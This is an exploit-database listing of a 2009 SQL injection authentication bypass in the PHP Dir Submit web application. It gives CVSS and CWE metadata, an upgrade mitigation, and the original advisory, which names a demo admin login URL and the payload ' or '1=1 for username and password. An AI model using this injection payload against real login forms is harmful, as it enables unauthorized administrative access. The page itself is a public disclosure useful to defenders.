header-logo
Suggest Exploit
vendor:
PHP Dir Submit
by:
Snakespc
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Dir Submit
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP Dir Submit (Auth Bypass) Remote Sql Injection

A vulnerability in the PHP Dir Submit application allows an attacker to bypass authentication and gain access to the administrative panel. This is done by entering ' or '1=1 as the username and password.

Mitigation:

Upgrade to the latest version of PHP Dir Submit
Source

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
PHP Dir Submit (Auth Bypass) Remote Sql Injection
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
Script:PHP Dir Submit
http://www.phpdirsubmit.com
-------------------------SNAKES TEAM-------------------------------------
Exploit:
-----------
http://demo.phpdirsubmit.com/admin/

Username:   ' or '1=1
Password:   ' or '1=1
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-18]